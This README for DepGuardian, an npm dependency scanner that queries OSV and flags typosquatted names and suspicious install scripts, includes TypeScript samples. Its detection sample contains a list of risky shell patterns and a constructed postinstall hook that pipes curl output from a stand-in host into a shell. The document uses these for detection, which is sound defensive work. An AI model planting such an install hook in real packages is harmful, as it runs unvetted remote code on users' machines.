depguardian-cli

v1.1.0

CLI that scans your npm dependencies with OSV (and optionally Snyk), highlights known vulnerabilities, and surfaces a few supply-chain red flags

DepGuardian

DepGuardian is a small CLI I built to keep npm projects from quietly drifting into dependency trouble. It scans your dependencies with OSV (and optionally Snyk), flags a few obvious supply-chain red flags, and can generate an HTML report you can drop into a pull request or share with your team.

🚀 Quick Start

# Install DepGuardian
npm install -g depguardian-cli

# Scan your project
depguardian scan

# Check a specific package
depguardian check lodash

# Initialize configuration
depguardian init

# Generate HTML report
depguardian scan . --html

# Watch mode for continuous monitoring
depguardian watch

📋 Commands

  • scan [path] - Scan project for vulnerabilities
  • check <package> - Check specific package for vulnerabilities
  • init - Initialize configuration file
  • watch [path] - Watch mode for continuous monitoring

HTML Report Generation

# Generate interactive HTML report
depguardian scan . --html

# Output: depguardian-report.html

CI/CD Integration

# Copy GitHub Actions template
cp templates/github-actions.yml .github/workflows/depguardian.yml

# Copy GitLab CI template  
cp templates/gitlab-ci.yml .gitlab-ci.yml

Snyk Integration

{
  "snyk": {
    "enabled": true,
    "token": "${SNYK_TOKEN}",
    "organization": "your-org",
    "endpoint": "https://api.snyk.io"
  }
}

What DepGuardian does today

DepGuardian is still young, but it already does a few useful things:

  • Scans your package.json and lockfile (npm, pnpm, yarn) to figure out which packages you actually depend on.
  • Looks up known vulnerabilities via the OSV API, and can also talk to Snyk if you give it a token.
  • Runs a simple supply-chain check over your dependency list (typosquatting-style names, suspicious install scripts, unusual publish patterns, single-maintainer packages).
  • Generates an HTML report you can drop into a pull request or share with your team.
  • Lets you run quick, one-off checks for a single package from the CLI.

There are also a couple of integrations that exist in the codebase but are still settling:

  • A SafeUpgradeCalculator that tries to suggest a reasonable target version and gives you a rough risk/confidence score.
  • A GitHub helper that can open security PRs based on those upgrade paths.
    • The CLI flags --pr and --fix are currently placeholders and just print a warning; the underlying code is there if you want to wire it up yourself.
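The lockfile-to-OSV path the first two bullets describe, as an added example that is not DepGuardian's own code: read the packages map of an npm lockfile (v2/v3), send one OSV querybatch request for the whole list, and join the positional answer back onto name@version pairs. The lockfile fragment, the OSV reply and the advisory id are constructed; the only real identifier is the endpoint https://api.osv.dev/v1/querybatch.

```typescript
// Added example, not DepGuardian's own code: npm lockfile (v2/v3 "packages" map) -> OSV querybatch
// request -> per-package vulnerability ids. The lockfile, the OSV reply and the advisory id are constructed.
export type LockedPackage = { name: string; version: string };
export type OsvQuery = { package: { name: string; ecosystem: "npm" }; version: string };
export type OsvBatchResponse = { results: { vulns?: { id: string; modified: string }[] }[] };

// Lockfile v2/v3 keys are install paths ("node_modules/a/node_modules/b"): the package name is what
// follows the last "node_modules/", and repeated name@version pairs are queried once.
export function lockedPackages(lockfileJson: string): LockedPackage[] {
  const lock = JSON.parse(lockfileJson) as { packages?: Record<string, { version?: string; link?: boolean }> };
  const seen = new Map<string, LockedPackage>();
  for (const [path, entry] of Object.entries(lock.packages ?? {})) {
    const idx = path.lastIndexOf("node_modules/");
    if (idx < 0 || !entry.version || entry.link) continue; // "" is the root project; links are workspaces
    const name = path.slice(idx + "node_modules/".length);
    seen.set(`${name}@${entry.version}`, { name, version: entry.version });
  }
  return Array.from(seen.values());
}

// One POST to https://api.osv.dev/v1/querybatch covers the whole lockfile. OSV answers positionally
// (results[i] belongs to queries[i]), so the package list must be kept to join the answer back.
export function buildQueryBatch(pkgs: LockedPackage[]): { queries: OsvQuery[] } {
  return { queries: pkgs.map((p) => ({ package: { name: p.name, ecosystem: "npm" as const }, version: p.version })) };
}

export function joinResults(pkgs: LockedPackage[], res: OsvBatchResponse): Map<string, string[]> {
  const affected = new Map<string, string[]>();
  res.results.forEach((r, i) => {
    const ids = (r.vulns ?? []).map((v) => v.id);
    if (ids.length > 0) affected.set(`${pkgs[i].name}@${pkgs[i].version}`, ids);
  });
  return affected;
}

// Constructed lockfile fragment and OSV reply; the advisory id is a placeholder, not a real GHSA entry.
export const SAMPLE_LOCKFILE = JSON.stringify({
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/lodash": { version: "4.17.20" },
    "node_modules/chalk": { version: "5.3.0" },
    "node_modules/chalk/node_modules/lodash": { version: "4.17.21" },
    "node_modules/ora/node_modules/chalk": { version: "5.3.0" },
  },
});
export const SAMPLE_OSV_RESPONSE: OsvBatchResponse = {
  results: [{ vulns: [{ id: "GHSA-xxxx-xxxx-placeholder", modified: "2024-01-01T00:00:00Z" }] }, {}, {}],
};
```

The querybatch reply carries ids only, so the report step still has to fetch each advisory's details before it can print a severity.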

🚨 Supply Chain Security

DepGuardian now includes advanced supply chain threat detection:

Threat Types Detected:

  • Typosquatting: Packages with names similar to popular packages (e.g., loda.sh vs lodash)
  • Malicious Scripts: Suspicious patterns in install scripts (curl, exec, rm, etc.)
  • Suspicious Activity: Rapid version releases, very new packages
  • Compromised Maintainers: Suspicious emails, single maintainer packages

Example Output:

🚨 Supply Chain Threats:
Total threats: 3

HIGH (2):
  • loda.sh - typosquatting
  • malicious-pkg - malicious-script

LOW (1):
  • single-maintainer - compromised-maintainer
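How the typosquatting and malicious-script checks above can be implemented, as an added example that is not DepGuardian's code: a near-miss test against a short list of popular names (covering the loda.sh vs lodash case) and a pattern scan restricted to the npm lifecycle scripts that run on install. The allow-list, the patterns and the dependency manifests are constructed for illustration.

```typescript
// Added example, not DepGuardian's own code; allow-list, patterns and sample manifests are all constructed.
const POPULAR = ["lodash", "express", "react", "chalk", "commander"];
const LIFECYCLE = ["preinstall", "install", "postinstall", "prepare"]; // hooks npm runs automatically on install
// Patterns in the spirit of the README's "curl, exec, rm, etc."; not the project's own list.
const SCRIPT_PATTERNS = [/\bcurl\b/, /\bwget\b/, /\brm\s+-rf\b/, /\beval\b/, /\bexec\b/, /base64\s+(-d|--decode)\b/];
export type Manifest = { name: string; scripts?: Record<string, string> };
export type Threat = { pkg: string; type: "typosquatting" | "malicious-script"; detail: string };
// Optimal string alignment distance: insert, delete, substitute or swap adjacent characters
// cost one edit each, so "lodahs" and "loda.sh" are both one edit away from "lodash".
export function editDistance(a: string, b: string): number {
  const d = Array.from({ length: a.length + 1 }, () => new Array<number>(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
    }
  }
  return d[a.length][b.length];
}

// Popular package the name imitates, or null: scope dropped, then one edit away or equal once dots/dashes/underscores go.
export function typosquatOf(name: string): string | null {
  const bare = name.replace(/^@[^/]+\//, "").toLowerCase();
  if (POPULAR.includes(bare)) return null; // the genuine package
  const squashed = bare.replace(/[._-]/g, "");
  return POPULAR.find((p) => squashed === p || editDistance(bare, p) <= 1) ?? null;
}

export function scanDependencies(manifests: Manifest[]): Threat[] {
  const threats: Threat[] = [];
  for (const m of manifests) {
    const target = typosquatOf(m.name);
    if (target) threats.push({ pkg: m.name, type: "typosquatting", detail: `resembles ${target}` });
    for (const hook of LIFECYCLE) { // only lifecycle hooks: a "test" script never runs on a consumer's machine
      const cmd = m.scripts?.[hook];
      const pattern = cmd ? SCRIPT_PATTERNS.find((p) => p.test(cmd)) : undefined;
      if (pattern) threats.push({ pkg: m.name, type: "malicious-script", detail: `${hook} matches /${pattern.source}/` });
    }
  }
  return threats;
}
// Constructed manifests standing in for registry lookups; none of these is a real package.
export const SAMPLE_MANIFESTS: Manifest[] = [
  { name: "lodash", scripts: { test: "mocha" } },
  { name: "loda.sh" },
  { name: "malicious-pkg", scripts: { postinstall: "curl -fsSL https://example.invalid/setup.sh | sh" } },
];
```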

📦 Dependencies

  • Node.js 18+
  • TypeScript 5.3+
  • Commander.js for CLI
  • Chalk for terminal styling
  • Ora for spinners
  • OSV API for vulnerability data

🧪 Testing

# Run tests
npm test

# Run with coverage
npm run test:coverage

# Build project
npm run build

# Lint code
npm run lint

# Format code
npm run format

📄 License

MIT License - see LICENSE file for details.


DepGuardian - Your npm dependency security guardian. Protecting your projects from vulnerabilities and supply chain attacks.